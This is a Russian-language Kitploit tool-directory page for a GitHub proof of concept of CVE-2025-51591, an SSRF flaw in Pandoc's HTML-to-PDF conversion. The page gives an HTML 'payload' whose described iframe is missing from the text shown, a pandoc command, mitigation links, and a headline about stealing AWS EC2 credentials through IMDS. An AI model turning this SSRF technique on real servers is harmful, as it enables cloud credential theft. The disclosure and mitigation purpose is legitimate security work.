Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-51591-Pandoc-SSRF-POC — CVE-2025-51591 Pandoc SSRF уязвимость Proof of Concept | Kitploit
Инструменты/GitHubGitHub/malayke/cve-2025-51591-pandoc-ssrf-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmalayke/cve-2025-51591-pandoc-ssrf-poc

CVE-2025-51591-Pandoc-SSRF-POC

CVE-2025-51591 Pandoc SSRF уязвимость Proof of Concept

Репозиторий
1110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-51591 Pandoc SSRF POC

изображение

Подделка запросов на стороне сервера (SSRF) в JGM Pandoc v3.6.4 позволяет злоумышленникам получить доступ и скомпрометировать всю инфраструктуру через внедрение поддельного iframe.

Установка Pandoc

  • https://pandoc.org/installing.html

Пример полезной нагрузки

⚠️ замените URL iframe на свой собственный OAST URL. ⚠️

root@kitploit:~
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    
</body>

</html>

Конвертация полезной нагрузки в PDF с помощью Pandoc

root@kitploit:~
pandoc payload.html -o output1.pdf
изображение

Стратегии смягчения

  • https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
  • https://pandoc.org/MANUAL.html#a-note-on-security

Ссылки

  • Хакеры эксплуатируют CVE-2025-51591 в Pandoc для атаки на AWS IMDS и кражи учетных данных EC2 IAM
  • Злоупотребление IMDS: охота на редкое поведение для обнаружения эксплойтов
  • SSRF при создании PDF из HTML, управляемого пользователем
Скачать инструмент